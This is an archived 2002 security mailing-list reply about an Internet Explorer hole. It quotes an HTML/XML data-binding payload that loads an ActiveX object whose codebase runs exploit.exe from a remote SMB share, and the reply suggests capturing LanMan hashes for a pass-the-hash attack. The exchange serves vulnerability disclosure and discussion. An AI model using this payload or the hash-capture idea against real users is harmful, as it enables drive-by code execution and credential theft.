Re: Rather large MSIE-hole

From: NoCoNFLiC (nocon@castleblack.darkflame.net)
Date: 03/15/02


Date: Fri, 15 Mar 2002 09:52:40 -0600
From: NoCoNFLiC <nocon@castleblack.darkflame.net>
To: John Swensson <jswensson@integres.com>


[jswensson@integres.com] Thu, Mar 14, 2002 at 04:23:55PM -0800 wrote:
> well if activex is enabled,
>
> doing this with a available readable by everyone windows share works
>
> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
> <xml id="oExec">
> <security>
> <exploit>
> <![CDATA[
> <object id="oFile"
> classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
> ]]>
> </exploit>
> </security>
> </xml>
>
>

    I could be wrong, but could this also open the posiblity of a
"pass the hash" type of attack by sniffing the LanMan hash
when the client connects to \\xxx.xxx.xxx.xxx\share\ ?

http://online.securityfocus.com/bid/233

-- 

- nocon

======================================

nocon@darkflame.net http://nocon.darkflame.net

======================================



Relevant Pages

  • Re: Client side access
    ... uploading it, you will need to use ActiveX, because ASP.NET does not have ... access to files on the client, and cannot execute files on the client. ... have never written ActiveX or JSP (although I have written java), ... compute its hash BUT not upload it to the server first. ...
    (microsoft.public.dotnet.framework.aspnet)
  • Re: Microsoft Activation Stupidity
    ... Windows Product Activation works off a hardware ... it compares the hash code with that ... > What the "acquire and dedicate an additional license" means is that I ...
    (microsoft.public.windowsxp.general)
  • Re: Reward Win 2k & Win 98 w/ DS clients not authorizing
    ... encryption. ... when MS advertises that the DS client will give connectivity. ... > installed on the Windows 9x machines?. ... >> Actually the DC's are no longer storing the LM hash. ...
    (microsoft.public.windows.server.networking)
  • RE: A question about passwords and login/authentication
    ... > Hash: SHA1 ... > I have heard that many *nix flavors used to default to using DES as ... > What I'm wondering is how long can a Linux password be? ... (console, xterm, windows SSH client, etc) ...
    (Focus-Linux)
  • SV: Brute-forcing cached Windows login password hashes
    ... doing a dictionary/hybrid attack will probably give ... I've done quite a bit of password audits on Windows ... The hash algorithm is a salted MD4. ... My question is regarding the encrypted password hashes that Windows ...
    (Pen-Test)